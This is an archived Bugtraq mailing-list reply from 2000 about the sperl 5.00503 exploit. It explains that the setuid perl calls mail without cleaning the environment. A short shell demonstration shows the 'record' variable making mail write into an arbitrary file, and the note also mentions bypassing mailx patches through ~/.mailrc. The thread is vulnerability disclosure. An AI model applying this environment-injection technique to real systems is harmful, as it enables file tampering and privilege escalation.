Bugtraq mailing list archives
Re: sperl 5.00503 (and newer ;) exploit
From: Joey Hess <joey () KITENET NET>
Date: Mon, 7 Aug 2000 15:38:52 -0700
Olaf Kirch wrote:
I'm sort of torn between whether to blame sperl for using mail rather than syslog, or for doing so without cleaning up the environment. Apart from the ~! expansion problem, there seems to be at least another one lurking which is that it'll try to load ~/.mailrc, and ~ is replaced with the value of $HOME.
... and you just have to set interactive in .mailrc. This works around the patches I've seen for mailx that stop it from looking at the environment for that variable. Another fun one that doesn't require interactive be set at all is: joey@kite:~>echo hi > foo joey@kite:~>echo "please don't kill me" > important joey@kite:~>record=/home/joey/important mail joey < foo You have new mail. joey@kite:~>cat important please don't kill me
From joey Mon Aug 7 15:25:07 2000
To: joey hi -- see shy jo
Current thread:
- sperl 5.00503 (and newer ;) exploit Michal Zalewski (Aug 07)
- Re: sperl 5.00503 (and newer ;) exploit Michal Zalewski (Aug 07)
- Re: sperl 5.00503 (and newer ;) exploit Olaf Kirch (Aug 07)
- Re: sperl 5.00503 (and newer ;) exploit Joey Hess (Aug 07)
- Re: sperl 5.00503 (and newer ;) exploit Pixel (Aug 07)
- Re: sperl 5.00503 (and newer ;) exploit Francis J. Lacoste (Aug 07)
- Re: sperl 5.00503 (and newer ;) exploit Greg A. Woods (Aug 09)
- Re: sperl 5.00503 (and newer ;) exploit Thomas Roessler (Aug 10)
- Re: sperl 5.00503 (and newer ;) exploit H. Peter Anvin (Aug 11)
- Re: sperl 5.00503 (and newer ;) exploit Olaf Kirch (Aug 07)
- Re: sperl 5.00503 (and newer ;) exploit Michal Zalewski (Aug 07)
- <Possible follow-ups>
- Re: sperl 5.00503 (and newer ;) exploit Paul Rogers (Aug 07)
- Re: sperl 5.00503 (and newer ;) exploit Solar Designer (Aug 07)
- Re: sperl 5.00503 (and newer ;) exploit Simon Cozens (Aug 07)
- Re: sperl 5.00503 (and newer ;) exploit Paul Szabo (Aug 07)